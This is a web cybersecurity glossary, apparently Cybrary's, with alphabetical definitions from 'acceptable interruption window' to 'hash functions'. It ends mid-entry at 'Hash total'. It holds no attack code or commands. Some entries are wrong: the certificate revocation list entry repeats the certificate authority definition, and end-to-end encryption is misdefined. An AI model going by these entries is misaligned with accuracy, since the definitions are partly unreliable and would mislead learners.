The Glossary

Cybersecurity Glossary

Cybrary’s cybersecurity glossary provides the cybersecurity community with knowledge of and insight on the industry’s significant terms and definitions. This list contains key terminology and is one of the most extensive cybersecurity glossary/vocabulary resources online. Start your search on the critical terms you need to know as a security professional.


Acceptable interruption window 1
An acceptable interruption window is the maximum time allowed for restoration, when interrupted, of critical systems or applications of an organization, so that its business goals are not negatively affected.
Acceptable interruption window 2
The maximum amount of a business can function without negatively affecting the goals of the organization, even when its critical systems or applications are unavailable.
Acceptable use policy
Acceptable use policy is a policy that defines the level of access and degree of use of the organization’s network or internet by the members of an organization.
Access control list acl
An access control list is a set of rules or instructions to inform the operating system about the access constraints for users or user groups, so that the operating system knows whether or not a user id has permission to access a file or a directory.
Access path
An access path is a logical order that directs to the location on the computer where an object such as webpage, file etc., is stored.
Access point
An access point is a computer networking device which allows a wi-fi compliant device to connect to a wired network and usually connects via a router.
Access profile
An access profile is information about a user that is stored on a computer, including their password and name as well as what they are allowed access to.
Access rights
Access rights are the privileges or permissions awarded to a user or a program to access or alter, edit, delete the files stored on a network.
Access type
Access type is applied to an entity class, mapped superclass or embeddable class and is used to specify attributes.
Account management user
User account management is the methods which are used to create, manage and authenticate users.
Accountability is the ability to trace an action performed on the system to a user, a process or an application.
Accounting legend code
Accounting legend code is numeric code used to indicate the minimum accounting controls required for items accountable communications security (comsec) material within the control systems.
Active security testing
Active security testing is security testing which involves directly interacting with a target, such as sending packets
Ad hoc network
An ad hoc network is a local area network (lan) that spontaneously builds as devices connect. An ad hoc network does not rely on a base station to coordinate different points, rather the individual base nodes forward packets to and from each other.
Administrative safeguards
Administrative safeguards are a special set of the hipaa security rules. Administrative safeguards focus on internal organization, policies and procedures and the maintenance of security managers which are in place to protect sensitive patient information.
Advanced encryption standard aes
An advanced data encryption algorithm that employs key sizes of variable length in the range of 128 – 256 bits. Advanced encryption standards help protect highly sensitive data such as financial information, and classified government records.
Advanced penetration testing
Advanced penetration testing is the process of testing a network to discover vulnerabilities which make it open to harmful intruders; then addressing and remedying the issues.
Advanced persistent threat apt
Advanced persistent threat is a user or a program that has highly sophisticated techniques and intends to pursue them with a malicious intent.
An adversary is a process, user or device that possesses a threat to the network.
Adware is software distributed to the user free of cost with advertisements embedded into them. As such, it displays advertisements, and redirects your queries to sponsor’s websites. Adware helps advertisers collect data for marketing purposes, without your permissions to do so. A user can disable ad pop-ups by purchasing a registration key.
Alert situation
An alert situation is when the interruption in an enterprise is not resolved even after the competition of the threshold stage, an alert situation requires the enterprise to start escalation procedure.
Alternate facilities
Alternate facilities are secondary facilities including offices, data processing centers etc., from where high- priority emergency tasks can be performed, delivered when primary facilities are interrupted, unavailable.
Alternate process
An alternate process is a back-up process devised to help continue a business critical process without any interruption, from the time the primary enterprise system breaks down to the time of its restoration.
Analog is a transmission signal denoted by ‘sine way,’ that varies in signal strength (amplitude) or frequency (time). While the higher and lower points of the wave denotes the value of signal strength, on the other hand the physical length of the wave indicates the value of time.
Anti malware
Anti-malware is a program designed to protect computers and networks against any threats or attacks from viruses such as adware, spyware, and any such other malicious programs.
Anti virus software
Antivirus software is a program or a set of programs that help prevent any malicious object, code, program from entering your computer or network. If any such malicious programs enter your computer, antivirus software helps detect, quarantine, or remove such programs from the computer or networks.
App attack
An app attack occurs when a user unknowingly installs a harmful app on their tablet or smartphone and the app in turn steals their personal data.
Application layer
An application layer is one of the seven layers in the open-system interconnection (osi) model of the tcp/ip protocol suite. Application layer defines the way process-to-process communication happens in a network; it only offers a strong communication interface and end user services.
Architecture is a structure that defines or describes the very fundamentals of a system or an organization, its components, the relationship between each of these components, their relationship to the overall system, and finally, their effectiveness in guiding the system towards its goals.
An asset is the resources of an organization, business either having tangible value – finance, infrastructure, physical properties, human resource – or of intangible value such as goodwill that helps business and can be converted to cash for future use.
Asymmetric key public key
An asymmetric key (public key) is a security measure that uses two keys to ensure the confidentiality of a message. One key encrypts the message, while the other key decrypts it.
Attack mechanism
An attack mechanism is a system or strategy by which a target is hit; the attacker may use different attack mechanisms such as a container or payload to hit the intended target.
Attack vector
An attack vector is a means and ways by which an attacker gains entry into the target system. Attackers mainly use the human element or the weak links to gain such access.
An attack is an action with malicious intention to interrupt the operations of a network or steal the data, etc.
Attenuation is the weakening of signal strength, analog or digital, especially when transmitted over long distances.
Audit trail
An audit trail is a detailed history of transactions to help you trace a piece of information back to its origin. In the field of computers, audit trail or paper log, helps maintain security, recover any lost data.
Authentication is the process of identifying a piece of information, the veracity of information provided. In computers, it is the process of identifying a person or system with the username; password, etc. Authentication helps individuals; systems gain authorization based on their identity.
Authenticity is the proof or validity that a claimed identity (whether human or a resource) is real and legitimate.
Availability is the time duration a system or resource is ready for use.
A backdoor or trapdoor is a process to gain unauthorized access to a computer or a network. A programmer may bypass security steps and gain access to a computer by trapdoor programs, in the event of an attack on the computer system or networks. Attackers may also use such mechanisms to enter computers or networks without proper permission.
Bandwidth is the volume of data or information that can pass through a network for a given period, and is usually measured in bits per second.
Banner grabbing
Banner grabbing is the process of grabbing banner information such as the application type and version. This information is then transmitted by a remote port when a connection is initiated.
A banner is a display on an information system that sets the parameters for system or data use.
Baseline security
Baseline security is the minimum set of security controls required for safeguarding an it system. Baseline security is based upon a system’s identified needs for confidentiality, integrity and availability protection.
Bastion host
A bastion host is a special services computer on a network that is designed to withstand attacks.
A bastion is a system of high level of security protection; such a system offers very strong protection against attacks.
Behavioral outcome
A behavioral outcome is what an individual who has completed a specific training module is expected to accomplish on regular IT security job performance.
Biometrics are a security system, which takes into account the unique physiological characteristics of a person such as fingerprints, dna, hair, etc., for identification purposes.
Bit error rate
A bit error rate is the ratio between the number of bits incorrectly received and the total number of bits transmitted in a telecommunications system.
Black core
A black core is a communication network architecture in which user data traversing a global internet protocol (ip) is end-to-end encrypted at the ip layer.
Blended attack
A blended attack is a hostile action with the intent of spreading malicious code.
Block cipher algorithm
A block cipher algorithm is a family of functions and their inverses parameterized by a cryptographic key in which the function maps bit strings of a fixed length to bit strings of the same length.
Block cipher
A block cipher is a method used to cipher text information by encrypting data in blocks, strings, or groups at a time rather than encrypting individual bits.
A botnet is a remote controlled robotic network or a network of computers set up to further attacks such as spam, virus, etc., to the target computers or networks. Attackers use various malicious programs, viruses to take control of computers and form a botnet or robotic network; the owners of such member computers may be unaware that their computer carries and forwards such a threat.
Boundary 1
A boundary is a fence or an imaginary line, which indicates the limit of an organization, and its relationship with its neighbors.
Boundary 2
The physical and/or logical perimeter of a system.
A bridge is an electronic device that connects two networks such as lan that uses the same protocol such as ethernet or token ring, and creates two distinct lan’s or wide area networks. Operating at the data link layer of the open system interconnect model, bridges have the ability to filter the information and can pass such information to the right nodes, or decide not to pass any information. They also help in streamlining or reducing the volume of traffic on a lan by dividing the data into two segments.
Bring your own device
Bring your own device (byod) is a policy of the organization allowing its employees to use their personal devices such as smartphones, tablet PCs, laptops for business purposes.
A broadcast is a process of transmitting the same message to multiple users simultaneously.
Brute force attack
A brute force attack is the process of finding the solution by constantly trying many probable variants of information such as passwords, deciphered keys, etc., in a random fashion.
Brute force
Brute force is a computing method that relies on strong algorithms and computing techniques to find the ultimate solution to a given issue.
Buffer overflow
A buffer overflow is when a program tries to store an excess amount of data to a buffer than it can hold, as there is a limit on how much data a buffer can hold, the surplus data overflows to the adjoining buffers. Thus, overwriting the data stored in those buffers, and triggering unpredictable consequences.
Business continuity plan
A business continuity plan is also known as a business emergency plan, it offers safeguards against a disaster, and outlines the strategies, action plan on how to continue business as usual in the event of any disaster.
Business impact analysis assessment
A business impact analysis/assessment is the process of evaluating and identifying risks and threats that a business might face in the event of an accident, disaster, or an emergency. It evaluates the possible risk to tangible and intangible assets such as personal, infrastructure, data and goodwill. In addition, it offers steps needed to recover from any such disasters.
A category is a restrictive label applied to classified or unclassified information to limit access.
Central services node
A central services node is the key management infrastructure core node that provides central security management and data management services.
Certificate authority ca
A certificate authority (ca) is an independent third party that verifies the online identity of an entity. They issue digital certificates that contain information about the owner of the certificate and details of the certificates, thus verifying the identity of the owner.
Certificate management
Certificate management is the process in which certificates are generated, used, transmitted, loaded and destroyed.
Certification revocation list
A certificate revocation list is an independent third party that verifies the online identity of an entity. They issue digital certificates that contain information about the owner of the certificate and details of the certificates, thus verifying the identity of the owner.
Chain of custody
A chain of custody is a process that defines rules for evidence to be legally accepted. A neutral third party, who has no interest in the case, collects the evidence after properly identifying it; and that the evidence is accountable until it is presented in the court of law. The collector makes the evidence tamper-proof and seals it tightly. It contains the complete information of the evidence as to how had collected it, and who had access to it.
Chain of evidence
The chain of evidence shows who obtained the evidence, where the evidence came from, also who secured, had control and possession of the evidence. The chain of evidence goes in the following order: collection and identification; analysis; storage; preservation; presentation in court; return to owner.
Challenge response protocol
Challenge response protocol is a kind of authentication protocol in which the verifier sends the claimant a challenge. Then, via hashing the challenge or applying a private key operation, a response is generated and sent to the verifier. This information is then verified to establish the claimant’s control of the secret.
A numerical value that helps to check if the data transmitted is the same as the data stored and that the recipient has error free data. It is often the sum of the numerical values of bits of digital data stored, this value should match with the value at the recipients end, and a mismatch in the value indicates an error.
Chief information security officer
A chief information security officer is a senior level executive of an organization entrusted with the responsibilities of protecting the information assets of the businesses and making sure that the information policies of the organization align with the objectives of the organization.
Chief security officer
A chief security officer is an executive of the company with assigned responsibility to protect assets such as the infrastructure, personnel, including information in digital and physical form.
Cipher text
Cipher text is data converted from plain text into code using an algorithm, making it unreadable without the key.
A cipher is a process to convert data into code, or encrypt, with the help of an algorithm; to decipher the code a key is required.
Ciphony is the process of enciphering audio information with the result of encrypted speech.
A claimant is the party who needs to be identified via an authentication protocol.
Cleartext is data in ascii format or data that is not coded or encrypted. All applications and machines support plain text.
Clinger cohen act 1996
The clinger-cohen act is also known as the information technology management reform act. This statute made significant changes in the way that its resources are managed and procured. The most significant aspect of this act is the requirement that each agency design and implement a process for maximizing the value and assessing and managing the risks of its investments.
Cloud computing
Cloud computing is a platform that utilizes shared resources to access information, data, etc., rather than local servers. Information is stored on, and retrieved from the cloud or internet. Cloud computing allows remote sharing of files, data and facilitates remote working, as long as users are connected to the internet.
Cold site
A cold site is a backup site that can become operational fairly quickly, usually in one or two days. A cold site might have all the standard office things such as furniture and telephones, however there is unlikely to be any computer equipment in a cold site. Basically, a cold site is a backup facility ready to receive computer equipment should it need to move to an alternate location.
A collision is a situation where two or more devices – networking devices or computers – try sending requests or transmit data to the same device at the same time.
Common access card cac
A common access card is a standard identification/smart card issued by the department of defense. A common access card has an embedded integrated chip storing public key infrastructure (pki) certificates.
Common attack pattern enumeration and classification capec
A common attack pattern enumeration and classification is a document published by mitre corporation that details how vulnerable systems are attacked. The community-developed document describes common attack patterns and how such attacks are executed.
Compartmentalization is a technique of protecting confidential information by revealing it only to a few people, to those who actually need to know the details to perform their job. Thus, by restricting access to information, data the risk to business objectives is limited.
Compliance documents
A compliance document is a document detailing the actions required to comply or adhere to the set standards by regulatory bodies. Any violations of the said rules attract punitive actions from the regulatory bodies.
Compliance is the act of abiding by, and adhering to the set standards, rules, and laws of the land, or of any such regulatory bodies, authorities. In the software field, for example, development of software adheres to certain standards set by the quality and standards body, and installation process abides by the vendor license agreement.
Computer emergency response team cert
A computer emergency response team (cert) is a team formed to study the vulnerabilities of information systems of an organization and offer solutions and strategies to face such vulnerabilities. Such teams are highly organized with clearly defined roles and responsibilities.
Computer forensics
Computer forensics is the process of analyzing and investing computer devices, on suspecting that such devices may have been used in a cybercrime, with the aim of gathering evidence for presentation in a court of law. Computer forensics offers many tools for investigation and analysis to find out such evidence.
Confidentiality is the set of rules that places restrictions on access to, or sharing of information with the aim of preserving and protecting the privacy of the information.
Configuration management
Configuration management is the process of entering, editing, updating information relating to an organization’s hardware and software. Every detail such as the version of software installed, updates applied to the software, and the location of the devices, etc., is recorded, updated regularly.
Consumerization refers to new trends or changes in enterprise technology as more and more consumers embrace such technology. Employees use devices for personal use and as they gain wide acceptance, even organizations start using such technologies.
Containment is steps taken to control any further risks upon identifying a threat.
Content filtering
Content filtering is a process by which access to certain content, information, data is restricted, limited, or completely blocked based on organization’s rules. Any objectionable email, website, etc., is blocked using either software or hardware based tools.
Control 1
Control is the policies, strategies, guidelines, etc. Established in collaboration with various departments of an organization such as management, legal, technical to help mitigate risk.
Control 2
A policy that guarantees an organization that the systems are reliable, and work in accordance with the established rules. It also assures that the organization complies with all the standards and rules as established by various authorities.
A countermeasure is a defensive mechanism that helps mitigate risk, threat, to a network or computers, using a process, system or a device.
Critical infrastructure
Critical infrastructure is the fundamental system of an organization that is important for its survival, any threat to such basic systems would push the entire organization into jeopardy.
Criticality analysis
Criticality analysis is evaluating the importance of an asset or information to an organization; and the effects its failure would have on the overall performance of the organization.
Criticality is the level of importance assigned to an asset or information. The organization may not function effectively and efficiently in the absence of an asset or information that is highly critical.
Cross site scripting xss
Cross site scripting is an attack on trusted and otherwise secure websites, by injecting malicious scripting. Attackers target websites that do not filter user inputs for strings or common characters in a script.
Cryptography is the science and art of protecting the privacy of information by encrypting it into a secret code, so no one but the authorized person with an encryption key can read or view the information.
A system or an algorithm to encrypt plain text to secret code or cipher text to protect the privacy of information stored. A key helps convert plain text to cipher text and vice-versa.
Cyber security architecture
Cyber security architecture is the information security layout that describes the overall structure, including its various components, and their relationships in an organization. It displays how strong the data security, controls and preventive mechanisms implemented in the organization are.
Cyber security
Cyber security are the processes employed to safeguard and secure assets used to carry information of an organization from being stolen or attacked. It requires extensive knowledge of the possible threats such as viruses or such other malicious objects. Identity management, risk management and incident management form the crux of cyber security strategies of an organization.
A cybercop is a law enforcement officer entrusted with the responsibilities of monitoring online activities to control criminal activities online or cybercrimes.
Cyber Espionage
Cyber espionage is spying on the computer systems of an organization with the help of a virus to steal or destroy data, information, etc. Such spying is unauthorized and happens in a clandestine matter.
Cyber warfare is virtual warfare waged online over the internet to weaken or harm the financial systems of an organization by stealing private and personal information available online on websites, etc.
Data asset
A data asset is any entity that is composed of data; for example, a database is an example of a data asset. A system or application output file, database, document, or web page are also considered data assets. Data assets can also be a service that may be provided to access data from an application.
Data classification
Data classification is a data management process that involves categorizing and organizing data into different classes based on their forms, types, importance, sensitivity, and usage in an organization.
Data custodian
A data custodian is an executive of an organization entrusted with the responsibilities of data administration, as such protecting and safeguarding data is the primary responsibility of a data custodian.
Data element
A data element is a basic unit of information that has a unique meaning and subcategories (data items) of distinct value. Gender, race, and geographic location are all examples of data elements.
Data encryption standard
A data encryption standard is a form of algorithm to convert plain text to a cipher text. Data encryption standard uses the same key to encrypt and decrypt the data, and hence it is a symmetric key algorithm.
Data flow control
Data flow control is another term for information flow control.
Data leakage
Data leakage is the accidental or intentional transfer and distribution of private and confidential information of an organization without its knowledge or the permission.
Data owner
A data owner is an executive of an organization entrusted with the administrative control of the data. Such an individual or executive has complete control over data, and he can control or limit the access of such data to people, assign permissions, etc., also he is accountable for such data accuracy and integrity.
Data retention
Data retention is the process of storing and protecting data for historical reasons and for data back up when needed. Every organization has its own rules governing data retention within the organization.
Data transfer device dtd
A data transfer device is a fill device designed to securely store, transport, and transfer electronically both comsec and transec keys. A dtd is designed to be backward compatible with the previous generation of comsec common fill devices, and programmable to support modern mission systems.
A database is a systematic collection and organization of data by individuals or organizations so that it can be easily stored, retrieved, and edited for future use.
Decentralization is the process of distributing functions, authorities among different people or to different locations.
Decryption key
A decryption key is a piece of code that is required to decipher or convert encrypted text or information into plain text or information.
Decryption is the process of decoding cipher text to plain text, so it is readable by the user. It is the opposite of encryption, the process of converting plaintext to cipher text.
Defense in depth
Defense in depth is the process of creating multiple layers of security to protect electronics and information resources against attackers. Also called the castle approach, it is based on the principle that in the event of an attack, even if one layer fails to protect the information resource other layers can offer defense against the attack.
Demilitarized zone
A demilitarized zone is a firewall setting that separates the lan of an organization from the outside world or the internet. Demilitarized zone (dmz) makes certain resources servers, etc., available to everyone, yet keeping the internal lan access private, safe and secure offers access only to authorized personnel.
Denial of service attack
A denial of service attack is an attack on a network or a machine to make it unavailable to other or important users. Single user floods the network or server with the same requests keeping it busy, occupied, and unavailable for other users.
Digital certificate
A digital certificate is a piece of information that guarantees that the sender is verified, genuine and that he is the person who he claims to be. Otherwise known as public key information, digital certificate issued by certificate authority, helps exchange information over the internet in a safe and secure manner.
Digital evidence
Digital evidence is electronic information stored or transferred in digital form.
Digital forensics
Digital forensics is the process of procuring, analyzing, interpreting electronic data for the purpose of presenting it as an acceptable evidence in a legal proceedings in a court of law.
Digital signature
A digital signature is an electronic code that guarantees the authenticity of the sender of information as who he claims to be, and that the information he sent out is first- hand, without any alterations. Digital signatures use the private key information of the sender and cannot be imitated or forged, easily.
Disaster recovery plan
A disaster recovery plan (drp) or a business continuity plan (bcp) prescribes steps required to carry on the business as usual in the event of a disaster. Disaster recovery plan aims to bring business activities back to normalcy in the shortest possible time; such efforts require an in-depth study and analysis of business critical processes and their continuity needs. Business continuity plans also prescribe preventive measures to avoid disasters in the first place.
A sudden event, catastrophe caused by the forces of nature or by a human error that results in serious damages to nature, society, human life, and property. Disaster in a business or commercial sense disables an enterprise from delivering the essential tasks for a specified period; for organisations disasters may result in loss of resources, assets, including data.
Discretionary access control
Discretionary access control is a security measure, by which the owner can restrict the access of the resources such as files, devices, directories to specific subjects or users or user groups based on their identity. It is the discretion of the owner to grant permission or restrict users from accessing the resources completely or partially.
Disk imaging
Disk imaging is the process of generating a bit-for-bit copy of the original media, including free space and slack space.
A disruption is an unplanned event that causes the general system or major application to be inoperable for an unacceptable length of time (e.g., minor or extended power outage, extended unavailable network, or equipment or facility damage or destruction).
Distributed denial service ddos
A distributed denial of service is a denial of service technique that uses numerous hosts to perform the attack.
Domain name system dns exfiltration
Domain name system (dns) exfiltration is a difficult to detect lower level attack on dns servers to gain unauthorized access. Such attack attacks lead to loss of data that range from simple to complex in nature and importance.
Domain name system
A domain name system is a distributed system that internet servers follow to convert alphabetical domain names into numerical ip addresses. Internet servers follow a numerical ip addresses system, and to remember the numerical values of many domains is a difficult task, so domains use alphabetical addresses. Every time a user types in an alphabetical domain name, the dns helps the internet by converting the alphabetical domain name into a numerical ip address.
Dual use certificate
A dual-use certificate is a certificate that is intended for use with both digital signature and data encryption services.
Due care
Due care is the degree of care a rational person would exercise in similar situations as the one at hand. Alternatively known as ordinary care or reasonable care is a test of a person’s preparedness to act, be responsible or neglectful of responsibility.
Due diligence
Due diligence is the process of conducting a thorough and detailed investigation, to verify the truthfulness of the information provided in the statements for analysis and review before committing to a transaction. It is a measure of prudence, a rational person would undertake before taking a final decision.
Duplicate digital evidence
Duplicate digital evidence is a duplicate that is an accurate digital reproduction of all data objects contained on the original physical item and associated media.
Dynamic ports
Dynamic ports are otherwise known as private ports, these ports ranging from port number 49,152 to 65, 535 do not need any registration; these ports help any computer application communicate with any other application or program that uses transmission control protocol (tcp) or the user datagram protocol (udp).
E commerce
The process of conducting any kind of business transaction or a commercial transaction electronically with the help of the internet is termed as e-commerce. The internet enables sellers to accept orders and payments online. As the most popular mode of business today, e-commerce is widely used for completing business-to-business; business-to-consumer; consumer-to-consumer; or consumer-to business transactions.
E government
E-government is the u.s. government use of web-based internet applications and other information technology
Easter egg
An easter egg is the hidden functionality within an application program, which becomes activated when an undocumented set of commands and keystrokes are entered. Easter eggs are typically used to display the credits for the development team and are intended to be non threatening.
Egress filtering
Egress filtering is the filtering of outgoing network traffic.
Electronic key entry
Electronic key entry is the entry of cryptographic keys into a cryptographic module using electronic methods such as a smart card or a key-loading device.
Electronic key management system
An electronic key management system is an interoperable collection of systems being developed by services and agencies of the u.s. government to automate the planning, ordering, generating, distributing, storing, filling, using, and destroying of electronic key and management of other types of comsec material.
Electronic signature
An electronic signature is the process of applying any mark in electronic form with the intent to sign a data object and is used interchangeably with digital signature.
Electronically generated key
An electronically generated key is a key generated in a comsec device by mechanically or electronically introducing a seed key into the device and then using the seed in conjunction with a software algorithm stored in the device to produce the desired key.
Elliptical curve cryptography ecc
Elliptical curve cryptography is a technique that uses an elliptical curve equation to create cryptography keys; keys generated by this theory are much smaller, faster, and efficient, as well! This modern technique keeps the decryption key private, while the encryption key is public. Unlike traditional methods of generating cryptography keys such as rsa, elliptical curve technique uses discrete algorithms making it difficult to decipher the keys or challenge the keys.
Embedded cryptographic system
An embedded cryptosystem is a system performing or controlling a function as an integral element of a larger system or subsystem.
Embedded cryptography
Embedded cryptography is cryptography engineered into an equipment or system whose basic function is not cryptographic.
Encapsulation security payload
An encapsulation security payload is an ipsec protocol that offers mixed security in the areas of authentication, confidentiality, and integrity for ipv4 and ipv6 network packets. Encapsulation security payload offers data integrity and protection services by encrypting data, anti-replay, and preserving it in its assigned ip.
To encipher is to convert plain text to cipher text via a cryptographic system.
Encryption algorithm
An encryption algorithm is a set of mathematically expressed rules for rendering data unintelligible by executing a series of conversions controlled by a key.
Encryption certificate
An encryption certificate is a certificate containing a public key that is used to encrypt electronic messages, files, documents, or data transmissions, or to establish or exchange a session key for these same purposes.
Encryption key
An encryption key is a code of variable value developed with the help of an encryption algorithm to encrypt and decrypt information.
Encryption is a process of maintaining data integrity and confidentiality by converting plain data into a secret code with the help of an algorithm. Only authorized users with a key can access encrypted data or cipher text.
End cryptographic unit
An end cryptographic unit is a device that (1) performs cryptographic functions, (2) typically is part of a larger system for which the device provides security services, and (3) from the viewpoint of a supporting security infrastructure (e.g., a key management system), is the lowest level of identifiable component with which a management transaction can be conducted.
End end encryption
End-to-end encryption describes communications encryption in which data is encrypted when passing through a network with the routing information still visible.
Enterprise architecture
The enterprise architecture is the description of an enterprise’s entire set of information systems: configuration, integration and how they interface. Enterprise architecture also describes how they are operated to support the enterprise mission, and how they contribute to the enterprise’s overall security posture.
Enterprise risk management
Enterprise risk management is the methods and processes used by an enterprise to manage risks to its mission and to establish the trust necessary for the enterprise to support shared missions. It involves the identification of mission dependencies on enterprise capabilities, the identification and prioritization of risks due to defined threats, the implementation of countermeasures to provide both a static risk posture and an effective dynamic response to active threats; and it assesses enterprise performance against threats and adjusts countermeasures as necessary.
An enterprise is an organization with a defined mission/goal and a defined boundary, using information systems to execute that mission, and with responsibility for managing its own risks and performance. An enterprise may consist of all or some of the following business aspects: acquisition, program management, financial management (e.g., budgets), human resources, security, and information systems, information and mission management.
Entrapment is the deliberate planting of apparent flaws in an information system with the intent to detect attempted penetrations.
Eradication is an important function of the incident management process that follows the containment of an incident. Upon identifying and controlling the incident in the containment stage, eradication helps identify and remove the root cause of the incident completely from the system and avoid any chances of recurrences of the incident.
Ethernet is the most popular local area network (lan) technology that specifies cabling and signalling systems for home networks or for organizations. Ethernet uses bus topology to support data transfers and carrier sense multiple access/ collision detection (csma/cd) systems to process requests at the same time.
An event is an action or an occurrence that a program can detect. Examples of some events are clicking a mouse button or pressing the key, etc.
Evidence is documents, records or any such objects or information that helps prove the facts in a case.
Exercise key
An exercise key is cryptographic key material used exclusively to safeguard communications transmitted over-the-air during military or organized civil training exercises.
Exploit code
An exploit code is a program that allows attackers to automatically break into a system.
An exploit is taking advantage of a weakness or a flaw in the system to intrude, attack it.
Exploitable channel
An exploitable channel is a channel that allows the violation of the security policy governing an information system and is usable or detectable by subjects external to the trusted computing base.
External network
An external network is a network not controlled by the organization.
External security testing
External security testing is security testing conducted from outside the organization’s security perimeter.
fail safe
A fail safe is the automatic protection of programs and/or processing systems when hardware or software failure is detected.
Fail soft
Fail soft is the elective termination of affected nonessential processing when hardware or software failure is determined to be imminent.
Failover is a system’s capability to switch over automatically without any warning or human intervention to a redundant or standby information system upon the failure or abnormal termination of the previously active system.
False positive
A false positive is an alert that incorrectly indicates that malicious activity is occurring.
Federal information system
The federal information system is an information system used or operated by an executive agency, a contractor of an executive agency, or by another organization on behalf of an executive agency.
Federal public key infrastructure policy authority fpki pa
The federal pki policy authority is a federal government body responsible for setting, implementing, and administering policy decisions regarding interagency pki interoperability that uses the fbca.
File encryption
File encryption is the process of encrypting individual files on a storage medium and permitting access to the encrypted data only after proper authentication is provided.
Filename anomaly
File name anomaly is a mismatch between the internal file header and its external extension. A file name anomaly is also a file name inconsistent with the content of the file (e.g., renaming a graphics file with a non-graphical extension).
File protection
File protection is the aggregate of processes and procedures designed to inhibit unauthorized access, contamination, elimination, modification, or destruction of a file or any of its contents.
File security
File security is the method in which access to computer files is limited to authorized users only.
File transfer protocol ftp
File transfer protocol (ftp) is an internet protocol for transferring files from one computer to another in a network using tcp/ ip.
Fill device
A fill device is a comsec item used to transfer or store keys in electronic form or to insert key into cryptographic equipment.
Firewall control proxy
A firewall control proxy is the component that controls a firewall’s handling of a call. The firewall control proxy can instruct the firewall to open specific ports that are needed by a call, and direct the firewall to close these ports at call termination.
A firewall is a security system tool that includes any software or hardware aimed at preventing viruses, worms, and hackers from intruding into a system or network.
Firmware consists of the programs and data components of a cryptographic module that are stored in hardware within the cryptographic boundary and cannot be dynamically written or modified during execution.
Flaw hypothesis methodology
Flaw hypothesis methodology is the system analysis and penetration technique in which the specification and documentation for an information system are analyzed to produce a list of hypothetical flaws. This list is prioritized on the basis of the estimated probability that a flaw exists, on the ease of exploiting it, and on the extent of control or compromise it would provide. The prioritized list is used to perform penetration testing of a system.
Flooding is an attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Focused testing
Focused testing is a test methodology that assumes some knowledge of the internal structure and implementation detail of the assessment object. Focused testing is also known as gray box testing.
Forensic copy
Forensic copy is an accurate bit-for-bit reproduction of the information contained on an electronic device or associated media, whose validity and integrity has been verified using an accepted algorithm.
Forensic examination
Forensic examination is the investigation to evaluate, analyze, organize, preserve, and document evidence, including digital evidence that helps identify the cause of an incident.
Forensic specialist
A forensic specialist is a professional who locates, identifies, collects, analyzes, and examines data while preserving the integrity and maintaining a strict chain of custody of information discovered.
Forensically clean
Forensically clean describes digital media that is completely wiped of all data, including nonessential and residual data, scanned for malware, and verified before use.
Forensics is the practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.
Forward cipher
A forward cipher is one of the two functions of the block cipher algorithm that is determined by the choice of a cryptographic key. The term “forward cipher operation” is used for tdea, while the term “forward transformation” is used for dea.
Freeware is an application, program, or software available for use at no cost.
Full disk encryption fde
Full disk encryption is the process of encrypting all the data on the hard disk drive used to boot a computer, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product.
Gateways are network points that act as an entrance to another network. A node or stopping point can be either a gateway node or a host (end-point) node. Get nearest server Get nearest server is a request packet sent by a client on an ipx network to locate the nearest active server of a particular type. An ipx network client issues a gns request to solicit either a direct response from a connected server or a response from a router that tells it where on the inter-network the service can be located. Gns is part of the ipx sap.
The gethostbyaddr is a dns (domain name system) query that returns the internet host name corresponding to an ip address.
Global information grid gig
The global information grid is the globally interconnected, end-to-end set of information capabilities for collecting, processing, storing, disseminating, and managing information on demand to warfighters, policy makers, and support personnel. The gig includes owned and leased communications and computing systems and services, software (including applications), data, security services, other associated services, and national security systems. Non-gig includes stand-alone, self-contained, or embedded it that is not, and will not be, connected to the enterprise network.
Global information infrastructure gii
The global information infrastructure is the worldwide interconnections of the information systems of all countries, international and multinational organizations, and international commercial communications.
The name gnu stands for “gnu’s not unix” (gnu is pronounced as g’noo). The development of gnu started in january 1984 and is known as the gnu project. Gnu is a unix-like operating system (os), that comprises many programs such as applications, libraries, developer tools, games. The gnu is available with source code that allows a user to run, copy, modify, distribute, study, change, and improve the software.
Gnutella is an open file sharing or peer-to-peer (p2p) network that was originally developed by Justin Frankel and Tom Pepper of Nullsoft in the early 2000. It was the first decentralised file sharing network that acts as a server for sharing files while simultaneously acting as a client that searches for and downloads files from other users.
Governance risk management and compliance
Governance, risk management and compliance is a comprehensive and integrated organization wide system for achieving the goals set in each area namely governance, risk management, and compliance, and meet the regulatory standards and requirements.
Governance is a system for directing and controlling an organization. It includes a set of rules, processes, practises established to evaluate the options, needs, conditions of the stakeholders such as management, suppliers, financiers, customers, etc. It also includes a framework for attaining the established goals of an organization, alongside achieving a balance between the goals of organization and interests of the stakeholders. It aims to protect the interests of the organization by protecting assets of the organization, and the interests of the creditors, customers.
Graduated security
Graduated security is a security system that provides several levels (e.g., low, moderate, high) of protection based on threats, risks, available technology, support services, time, human concerns, and economics.
Group authenticator
A group authenticator is used sometimes in addition to a sign-on authenticator, to allow access to specific data or functions that may be shared by all members of a particular group.
Guard system
A guard system is a mechanism limiting the exchange of information between information systems or subsystems.
Guessing entropy
A guessing entropy is a measure of the difficulty that an attacker has to guess the average password used in a system. In this document, entropy is stated in bits. When a password has n-bits of guessing entropy then an attacker has as much difficulty guessing the average password as in guessing an n-bit random quantity. The attacker is assumed to know the actual password frequency distribution.
A guideline is a general rule or a piece of advice required to follow in order to accomplish the set goals of an organization.
A hacker is a term used for an expert computer programmer who tries to gain unauthorized access into a network or computer systems with intent.
Handshaking procedures
Handshaking procedures are the dialogue between two information systems for synchronizing, identifying, and authenticating themselves to one another.
Hard copy key
A hard copy key is physical keying material, such as printed key lists, punched or printed key tapes, or programmable, read-only memories.
Hardening is also known as system hardening and refers to providing protection to a computer system at various layers such as host, application, os, user, physical levels, and all the other sublevels in between. A hardened computer system is a more secure computer system. Hardening eliminates as many risks and threats to a computer system as necessary.
Hardware is the physical component of an information system. See also software and firmware.
Hardwired key
A hardwired key is a permanently installed key.
Hash based message authentication code hmac
Hash-based message authentication code is a message authentication code that uses a cryptographic key in conjunction with a hash function.
Hash function
A hash function is a function that is used to map data of arbitrary size to a data of a known or fixed size. The values returned by a hash function are called hash values, hash codes, hash sums, or simply hashes.
Hash functions
A cryptographic hash function is a kind of hash function where it is practically impossible to recreate the input data from its hash value alone. The input data is referred to as the ‘message’, and the hash value is called the ‘message digest’ or the ‘digest’. The result of this hash function can be used to validate if a larger file has been changed, without comparing the larger files. Examples of frequently used hash functions are md5 and sha1.
Hash total
